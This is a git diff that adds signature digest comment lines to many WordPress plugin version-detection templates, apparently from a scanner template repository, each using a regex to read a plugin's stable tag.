3deac58709..bbed46d170 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fc8bbcb8eb88ebd4af3165393b0a306f0dcb390693d372b79b674dc5d58a92c3022076a57d6513dc1cdf3ae8a71dcaebfba1753f45cb4514e3658413c067a86d377a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e7e7c27682..453b40cece 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ce814f581ecd8cfe97bc9cd869217d6b8c7aa12c297fb06e379cc94913462a3402204014eb3dfd5c16dfe481a3929567bd0ff2f817e50e71ca1e6f90b62c06696ff7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad4ebefa4b..1ee51ae0bc 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100805559d8d224dde38108de924b23585c7808466817c0afda60313b6cd43d4c4702205478413e43da1a9a02e33d713e89bf30aa758a32508c00d00c8d50d33e770b38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 8e88c81c0a..9d4bb4b8e5 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210097fcc9508745212574650c37d666716ee23af052d2fd9656b50910e3a3cf33ee022100b9001253930fe85d034d6c328d71e5cd1f5d6bfe01df00ca54735ae1bc667d94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 39d269fb85..09d356cf1f 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202e4932a43310b47b72938e6ae76473fdfd62f85f7a8cd7fcd03a66371fd1e63f022100f95cf2ae9396a91a915d2dc71c1731078526b3da0fcd90f09e497d47fcc64c99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fc126d83c6..cd9f7d991c 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bcde5bc61063cdb6ebe91c4c9164943b2726ca90e79cca225f72768e15de11a902203bdcf41f464a5ea40d905cebe040999afe5d680c6b424c0068c3670d1a072f0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8c49a34259..97ac8ef3f9 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205bcc532659c69b1e545fd543088d252b18447d58018463c968ef1e251f5a7b95022100c32ff3c946d16770659a77ddd84a3046516bac64b4d524af7c731c387e5aab58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 6ac2212b4b..b64377e93a 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202528e351b612026f903b4c8ded333dc1d1930bcc3b3532a1ee6453cd0917b17e022039e41003d1967daa3ad9e711265372dcb28de3083ce649bdc62e934468ffe5eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 71c71b5ed1..83497f83fe 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202e0e2af48807db4df1d0fead3f9fc59c5e2c590bb983e09cc0a9f6b52e727b0202203e1574264f18a2c216724cb9ba4537746a382225d6228f040b4fc0f93aefcfbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7b47adc274..971bf1b84c 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203156dad3a0ac60eac295a3a98373136f0a282f951352c094c244bd739214247e022100d23e4ec9ed5f853e5b4eeff6727579fb61b875857125f834fd18b82d1a1e4b1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 286dfdaec6..7712b5b0f6 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220785b2863667108c59109287eec34c362087f5804f459e90270024f9451556797022100fc3758dc3c1103217e8b641d0df133f1e7e5dc6f5abe3cae6e6f2f83d585dc62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c4928059f6..0cd403f9f9 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220323ff10d709e4f043cbfee25956e2bb03ff9d5713fad5f52713b9e071ab0a98302206c3c62a17a11ac94827d010f4b024b7defcd7194fa9c8b1151ccd5a7ab2e6c4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index f6a7836f35..eecaa304d8 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a52851b4c9f1b6c1358cf85d9d7772b87988b2d6303d1ba99848b5a1ab4f8270022100cd144d75e483b6b44f73dd290c3ad7378eb066c6b9b7d9fd2c885b264464fd1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b7af708c4f..d7ccaac514 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022063e57dd659e05958288eb0f5b1212610dee605d7d297efe2a713d28d9ac63d15022100802f238d9505d00ae7b4ddb9868adbabecb947962edb92861f270ab286b7def6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 61a793edf7..2673b55da1 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206c51137896666dbd906ce8c265222abb251cf9d7bd6adf299d3e8d79000d15ab02202be54811c093bb43f87cb15f4ea3118ac5723b4a8b3bac5b14ac116f31fa124b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0da88d5d3f..27e08d6e24 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022001755e10ea4669e7e1d2acae330136c78d9bb1a6a0592b85174fd89758e02424022100ad546d37591d2f94289a39579c37f2c100c89ace49480f5dd98251dfd54f18f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 2b29428cf1..5adc3b3d8e 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a32b2efdea579cd3901eb388b7a6f7f13cb572b9dc4807aa80f3ea425658e9800221008fafd0d4a5d3fb161d5749ff8ea38461cc2a1596ab09da568027897f7109d023:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 181e619a7c..b78ebf6162 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205f781b0b93457335e92b9088b9ff2bd8df3a834fe82e0297285c517f282e9064022100cba5a744a62a4542f770d61f24b13edb530bf04be92ab3aeebdd9520959d3129:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8164eb4483..d51c2b8ad5 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d0acdb16ce9c1e4955d003b0716b432a5f575347f3e65c9b9a1cefa50574372f02200a3828a3b8f7a836c12ff376a832ecf52f0c235b0e30aa1df687db4ada21ca2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 59554defdf..62b556358e 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204d477bc9c42edc58c05722ced120913c148e6379c95b46a150a0d527ab90eb1902202868236b5700a1e26a746cd27d0d2f2c10d49f579e2614d4d004a61f326c5c0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 350fd9436b..764fa2c254 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202f325157461ce894d846e0c83d689cddde761363e0786a80c0e94b7b6c39020102210094edf2ccba11a6076834e0dc12230b8797ee4e57733171cce43a55e05cdfd02e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 2ae6bafbba..0e2285e1d7 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205d744b92508aade6117a743a37898bc44ef21f01a6b7055b8b75c821cd0d6115022100b4778840cb33c0bbed3302480e7084fca20906f205861491ff3d7e32039459f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d0dc8d92bb..8386235618 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e80d66f3749a9a8b8fc2f34fd34fe286b375b60584105901d09fb6a8fed6c33f022100e3e7ac54d8719c401bd6e29cde3b30cd4f0548630f766d867d61cda711498b83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index c49bbc2b6d..38c96a7aef 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203b83e72b6db2dc3f1595a9552129fe646538c39c74786d8a1f6b66c6280d1585022100be844eca6c2f20b8f326cc8c4bbc19b62098b151a7fb35c9a0ea0e758d8e71f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 27586cbd9d..a5942e59e7 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100806596defb9ed1e683906356a10a824ca8510471decc1265364433ad68f7dd23022024af1bb2b5e97961b0420043cc53909dfb528b5d2afa449d8ae9a74f7c8f109f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 946272f0a9..56cc7f2ce4 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100897bf8e4f3fef2550d820897f0d36da3514333b915176650cc766e76717db88802201d14ba70d10b8027d15c98ffe90f0a302fe2a71786f96d8b9eeb32457679fd2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aa29706872..5e27827f65 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022075259b082a9294e4b83902658e7fda84ce725bc70aa5d142ff91c31be38b474802206e982c1d948446cb2496805aff866c6c2bd44267c55f3bdbd223c973552cf755:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 290d53ab7e..ef518ba6b5 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a1f5e79cbf6197de5e969768c57fd05f1c8d2529000c390482476ae75f533f6f022029d91de5f39bba17c151ac66963d376d67c7ceed3ba6f236903153d113e398a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index f7c9ef9b1f..5caab88ac1 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022079c9245f99a8a959a76ac42768a5e7648af845563b1e30df289fb03e3fa47aee02204234df6f275c0eaa7f4e7346c9f88837e9f7402f5179a032884ea34c3ff2c1d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f1c16275a2..b48c0f1c81 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207892203cccb4ded710c8343cee0e306bb49b67fb65f7cf97883f7ab9fa6b9d8402200703f1b82f95af3f2126d5b30864daf0d42a5d82aa54c91bdf40b4664e6050de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fc072e19d8..858dddeea3 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022023e8539877201c38b646252385537569f3ae9942c08da10cdbc03f57491112c3022100e45f27dbcf811688592fcf1de9d0ae6f53b5ba596475ea6e20076357bad66766:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index da9df0e8a5..857a6bb96a 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201c7087b851921dec3ab0946892412a8f9d650db9990226f9fdcf4afe0195af8a022100e8488585af8e447297c88b48d549b1dfb3b65fe74378f92ed1019add1e4a050f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f8113d9750..c4e1565aca 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201479997689ca88c463b4390ff0ff5f253d03b23ccd46c94b5368161c0e8e28f102206ecdf710f3775a5973226728c36a523d7d434009cb3dc7a13ac052d2fe472eb7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f80282ab2..79ae86782e 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022066a055471ab6c2681763996c9140b53ef658669d08a26af28dc2c60599c2e6d5022025d04db322aa8d0be198d768a18e3b6bf3cde3a2def7f7b70041e034221a8717:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5725d5bb3f..461873c62e 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210083605f1649ee8f2ace7cf69cdbb5768bc9b9d28dad343d7fffaf73eab5de993002201d1336c49c2d8a3e3cd06b3c2f32366c2623cc601dce025d2fa5c349472e0acc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index f67a8bc18a..9542df5a27 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a940fa9cb74550ca9432cbe26ded8b5848ce295f5a75ab997ffe5d662051b43c02204fd61f8553ae2221407581ba57ecf2507f40d871b02151b17b7b199d5041fe7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index a773829b7d..2a4504e435 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f4887ec192c286460dd5c6f5dd3b4dd26f09c6a8c648c4a86b0fe6f89b487a75022100b7bf7cfefc51711d5781fc018e7c320f3b4be6c2ed6d52dc67ed32268989bbbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index b9bd4be0a8..5da393f118 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022025595723b627d47bc8fa072f2da37650a026c7b4ee68bb45c55fbb4b5d8424a0022100f775a956ddfc9915b8a6ebf2b0721ac15afbbf03a1947d39bd51e31254c8df5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bece4ce486..d227059c3a 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a6eb0ef14ca7d1857490e058f483ddaa11844fc6ae9e4e33ab733f9a10c744bf022100913f568d1cd6671547b9d275291fc3603aa63b2c6c091bd9c0e34a94faf38132:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 138b0aa9a6..8626b7e907 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220384861854c8f057531ae4d2a531f4b006a28781f79c655efc57f5eeb7977af5502205590b64ec0e98382f3d52ad4ecd2dabb911c47cbd608dd24aee04ca3a92fb371:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 68bf71bc83..7fbbe2036e 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022020d2b9bdcbcd1615e472d6437f942a48dfd27aff76e0e3c8858f9c7fb6b7cdaa0221008312b9eaa0fefe599bffd400c3f3f81361241851a29ca3a45e75184c399fc660:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 10dad2d2fb..6579f954cf 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b0c56f21cdfafd94cc17cc4571dbe06c649b78fb8cc84f58aef4a026e85ee2b202210094580408f9ddd92043628610fcc2d9c060e0264077552b21042908efcf9f1805:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index e9efe6fb53..ab5930d1da 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022039a93dfbed66589f343e47683d5c826374296bfa4a9fe462c7c34b80670d96a3022024cb8e6c31a04ae28fa1669248ac838384a4674446c921b91048651b4cb3bb76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index c3d10f0135..2dddf79ca4 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203911326bcb353778271da58f70c0d87300cae1dca515d06c4e88aaddd33e4520022100e65a6d101b7e02a94d536a3a009b7628dfdd2857a8a1f2c3b3eefa9bf3058fb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 4a8bc6b75c..e00221acdf 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220527c630dd237339dd1c5b15dcc4b32f50ca30c09eefb71fc4fc76af85caef83d022100be4a49fdc13c618ff5d418432348acb45859d18f9c053bcf4fc85dcfa147d304:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c74355bd..b0c4706a6a 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220277dae256fe1a1af2ff83c4388bf3f2d352efd2232610da482605d71a408760c022100f26a58a64502b253e01f530f22d00d598da4252345a4186992d8bf18d619af88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 94b8494b08..e87338d6d1 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 